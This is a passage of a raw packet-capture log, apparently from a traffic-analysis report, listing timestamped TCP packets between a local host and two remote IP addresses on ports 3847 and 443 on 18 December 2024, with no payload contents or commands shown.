                                                                                                                                                Dec 18, 2024 19:28:00.897695065 CET499273847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:28:00.897758961 CET38474992787.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:00.899399996 CET38474992787.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:00.899436951 CET38474992787.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:00.899466991 CET499273847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:28:00.901016951 CET38474992787.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:00.901072979 CET499273847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:28:00.901124954 CET38474992787.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:00.902672052 CET38474992787.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:00.902786970 CET38474992787.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:00.902801037 CET499273847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:28:00.904371977 CET38474992787.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:00.904434919 CET499273847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:28:00.904515028 CET38474992787.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:00.906027079 CET38474992787.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:00.906078100 CET499273847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:28:00.906084061 CET38474992787.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:00.907658100 CET38474992787.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:00.907711029 CET499273847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:28:00.907715082 CET38474992787.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:00.909710884 CET38474992787.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:00.909763098 CET499273847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:28:00.909797907 CET38474992787.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:00.910980940 CET38474992787.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:00.911031008 CET499273847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:28:00.911039114 CET38474992787.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:00.912718058 CET38474992787.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:00.912766933 CET499273847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:28:00.912805080 CET38474992787.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:00.914417982 CET38474992787.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:00.914458036 CET38474992787.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:00.914467096 CET499273847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:28:00.916134119 CET38474992787.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:00.916181087 CET38474992787.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:00.916182995 CET499273847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:28:00.917733908 CET38474992787.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:00.917781115 CET499273847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:28:00.917814016 CET38474992787.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:00.919399977 CET38474992787.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:00.919449091 CET38474992787.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:00.919461966 CET499273847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:28:00.921051025 CET38474992787.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:00.921097994 CET499273847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:28:00.921147108 CET38474992787.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:00.922801018 CET38474992787.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:00.922887087 CET38474992787.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:00.922935963 CET499273847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:28:00.924369097 CET38474992787.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:00.924417019 CET499273847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:28:00.924552917 CET38474992787.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:00.926001072 CET38474992787.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:00.926043987 CET499273847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:28:00.926132917 CET38474992787.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:00.927695036 CET38474992787.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:00.927737951 CET499273847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:28:00.927819014 CET38474992787.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:00.929333925 CET38474992787.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:00.929382086 CET499273847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:28:00.929425001 CET38474992787.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:00.931217909 CET38474992787.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:00.931263924 CET499273847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:28:00.931351900 CET38474992787.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:00.932651043 CET38474992787.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:00.932724953 CET499273847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:28:00.932806015 CET38474992787.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:00.934341908 CET38474992787.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:00.934389114 CET38474992787.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:00.934391975 CET499273847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:28:00.936311960 CET38474992787.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:00.936358929 CET499273847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:28:00.936398983 CET38474992787.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:00.937695980 CET38474992787.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:00.937737942 CET499273847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:28:00.937824011 CET38474992787.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:00.939364910 CET38474992787.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:00.939415932 CET499273847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:28:00.939440966 CET38474992787.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:00.940992117 CET38474992787.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:00.941097975 CET38474992787.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:00.941123009 CET499273847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:28:00.942747116 CET38474992787.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:00.942795038 CET499273847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:28:00.942823887 CET38474992787.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:00.944370031 CET38474992787.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:00.944490910 CET38474992787.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:00.944542885 CET499273847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:28:00.946027040 CET38474992787.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:00.946147919 CET499273847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:28:00.946178913 CET38474992787.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:00.947782993 CET38474992787.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:00.947843075 CET499273847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:28:00.947911024 CET38474992787.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:00.949347019 CET38474992787.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:00.949466944 CET38474992787.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:00.949505091 CET499273847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:28:00.950999022 CET38474992787.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:00.951045990 CET499273847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:28:00.951103926 CET38474992787.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:00.952735901 CET38474992787.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:00.952785969 CET499273847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:28:00.952871084 CET38474992787.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:00.954437017 CET38474992787.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:00.954547882 CET38474992787.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:00.954549074 CET499273847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:28:00.956082106 CET38474992787.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:00.956134081 CET38474992787.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:00.956157923 CET499273847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:28:00.957734108 CET38474992787.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:00.957778931 CET499273847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:28:00.957946062 CET38474992787.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:00.959362030 CET38474992787.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:00.959414005 CET499273847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:28:00.959460020 CET38474992787.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:00.961036921 CET38474992787.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:00.961116076 CET499273847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:28:00.961146116 CET38474992787.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:00.962682009 CET38474992787.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:00.962728977 CET499273847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:28:00.962798119 CET38474992787.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:00.964360952 CET38474992787.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:00.964453936 CET499273847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:28:00.964481115 CET38474992787.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:00.966017962 CET38474992787.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:00.966064930 CET499273847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:28:00.966190100 CET38474992787.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:00.967329025 CET38474992787.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:00.967375040 CET499273847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:28:00.967474937 CET38474992787.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:00.968986988 CET38474992787.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:00.969037056 CET499273847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:28:00.969208956 CET38474992787.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:00.970670938 CET38474992787.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:00.970719099 CET499273847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:28:00.970766068 CET38474992787.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:00.972352982 CET38474992787.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:00.972403049 CET499273847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:28:00.972408056 CET38474992787.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:00.974098921 CET38474992787.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:00.974153042 CET38474992787.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:00.974159002 CET499273847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:28:00.975704908 CET38474992787.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:00.975753069 CET499273847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:28:00.975826979 CET38474992787.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:00.977283955 CET38474992787.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:00.977350950 CET499273847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:28:00.977407932 CET38474992787.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:00.978976011 CET38474992787.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:00.979026079 CET499273847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:28:00.979099035 CET38474992787.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:00.980645895 CET38474992787.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:00.980700016 CET499273847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:28:00.980876923 CET38474992787.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:00.982314110 CET38474992787.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:00.982356071 CET499273847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:28:01.104285002 CET38474992787.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:01.104315996 CET38474992787.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:01.104727030 CET499273847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:28:01.104903936 CET38474992787.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:01.105000973 CET38474992787.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:01.105158091 CET499273847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:28:01.106134892 CET38474992787.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:01.106245995 CET38474992787.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:01.106277943 CET499273847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:28:01.107477903 CET38474992787.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:01.107954025 CET38474992787.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:01.107989073 CET499273847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:28:01.108062029 CET38474992787.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:01.109107018 CET38474992787.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:01.109138966 CET499273847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:28:01.109791040 CET38474992787.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:01.109910965 CET38474992787.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:01.109961987 CET38474992787.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:01.109996080 CET499273847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:28:01.111323118 CET38474992787.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:01.111377001 CET38474992787.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:01.111417055 CET499273847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:28:01.112273932 CET38474992787.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:01.112308979 CET499273847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:28:01.112339020 CET38474992787.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:01.113790035 CET38474992787.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:01.113837004 CET499273847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:28:01.113919973 CET38474992787.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:01.114999056 CET38474992787.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:01.115036011 CET499273847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:28:01.115117073 CET38474992787.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:01.181691885 CET499273847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:28:01.252371073 CET499273847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:28:01.374365091 CET38474992787.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:01.374496937 CET499273847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:28:01.497231007 CET38474992787.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:01.782308102 CET38474992787.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:01.782412052 CET499273847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:28:01.782469988 CET499273847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:28:01.782702923 CET38474992787.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:01.782762051 CET499273847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:28:01.782792091 CET38474992787.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:01.782830954 CET499273847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:28:01.902189016 CET38474992787.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:01.902225971 CET38474992787.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:06.775831938 CET499583847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:28:06.897186995 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:06.897298098 CET499583847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:28:06.897511005 CET499583847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:28:07.164910078 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:08.297261953 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:08.297410011 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:08.297552109 CET499583847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:28:08.306274891 CET499583847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:28:08.427647114 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:08.714287043 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:08.714561939 CET499583847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:28:08.839378119 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:09.172893047 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:09.175884962 CET499583847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:28:09.352384090 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:09.352427959 CET499583847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:28:09.471987009 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:09.666141987 CET49943443192.168.2.445.149.241.141
                                                                                                                                                Dec 18, 2024 19:28:09.711324930 CET4434994345.149.241.141192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:09.757580042 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:09.761420012 CET499583847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:28:09.968209982 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:09.968290091 CET499583847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:28:10.088149071 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:10.373291016 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:10.380589962 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:10.380610943 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:10.380624056 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:10.380656958 CET499583847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:28:10.380723953 CET499583847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:28:10.380773067 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:10.389990091 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:10.390124083 CET499583847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:28:10.399337053 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:10.406845093 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:10.407464981 CET499583847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:28:10.416217089 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:10.425690889 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:10.425869942 CET499583847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:28:10.435189962 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:10.444324970 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:10.451872110 CET499583847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:28:10.453754902 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:10.463303089 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:10.465538025 CET499583847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:28:10.572578907 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:10.572587967 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:10.572652102 CET499583847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:28:10.575997114 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:10.576066017 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:10.576205015 CET499583847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:28:10.587538958 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:10.587656975 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:10.587791920 CET499583847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:28:10.599194050 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:10.599306107 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:10.599611998 CET499583847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:28:10.610702991 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:10.610780954 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:10.610912085 CET499583847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:28:10.621485949 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:10.621593952 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:10.621711016 CET499583847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:28:10.631839037 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:10.631947994 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:10.632075071 CET499583847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:28:10.642502069 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:10.642649889 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:10.644350052 CET499583847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:28:10.653112888 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:10.653261900 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:10.653347015 CET499583847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:28:10.663707018 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:10.663784027 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:10.664081097 CET499583847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:28:10.667649031 CET49962443192.168.2.445.149.241.141
                                                                                                                                                Dec 18, 2024 19:28:10.667738914 CET4434996245.149.241.141192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:10.668550968 CET49962443192.168.2.445.149.241.141
                                                                                                                                                Dec 18, 2024 19:28:10.668622971 CET49962443192.168.2.445.149.241.141
                                                                                                                                                Dec 18, 2024 19:28:10.668639898 CET4434996245.149.241.141192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:10.674288034 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:10.674433947 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:10.674520016 CET499583847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:28:10.684926987 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:10.684952021 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:10.685045958 CET499583847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:28:10.695502996 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:10.695544958 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:10.695696115 CET499583847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:28:10.764750957 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:10.764847040 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:10.765034914 CET499583847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:28:10.768641949 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:10.770081997 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:10.770181894 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:10.770395041 CET499583847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:28:10.778115988 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:10.778188944 CET499583847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:28:10.778430939 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:10.785885096 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:10.785924911 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:10.786278963 CET499583847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:28:10.793643951 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:10.793755054 CET499583847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:28:10.793792009 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:10.801079035 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:10.801141024 CET499583847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:28:10.801336050 CET38474995887.120.127.215192.168.2.4
